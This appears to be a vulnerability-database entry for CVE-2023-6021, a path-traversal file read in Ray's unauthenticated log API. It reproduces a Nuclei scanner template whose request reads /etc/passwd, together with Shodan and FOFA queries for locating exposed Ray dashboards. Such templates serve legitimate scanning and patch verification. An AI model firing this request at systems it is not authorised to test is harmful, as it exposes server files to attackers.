Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6021
HistoryDec 05, 2023 - 4:49 p.m.

Ray API - Local File Inclusion

2023-12-0516:49:31
ProjectDiscovery
github.com
23
cve2023
lfi
ray
oos
file inclusion
security

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

8.4

Confidence

High

EPSS

0.004

Percentile

75.2%

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
id: CVE-2023-6021

info:
  name: Ray API - Local File Inclusion
  author: byt3bl33d3r
  severity: high
  description: |
    LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
  reference:
    - https://huntr.com/bounties/5039c045-f986-4cbc-81ac-370fe4b0d3f8/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6021
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6021
    cwe-id: CWE-22,CWE-29
    epss-score: 0.0038
    epss-percentile: 0.72895
    cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ray_project
    product: ray
    shodan-query:
      - html:"Ray Dashboard"
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - body="ray dashboard"
      - icon_hash=463802404
  tags: cve,cve2023,lfi,ray,oos,ray_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/nodes?view=summary"
      - "{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_2
        words:
          - "text/plain"
          - "aiohttp"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        internal: true
        name: nodeid
        json:
          - '..|objects|.nodeId//empty[0]'
# digest: 4a0a00473045022100e1248f0ce74ec3ad6e929f214a946c92e4efaf53912ff535667598345e88495f02206ca3d10c0df29c683bb373a193d673c8c661b9096c6a83cfe8f81015012efe4f:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

8.4

Confidence

High

EPSS

0.004

Percentile

75.2%

Related for NUCLEI:CVE-2023-6021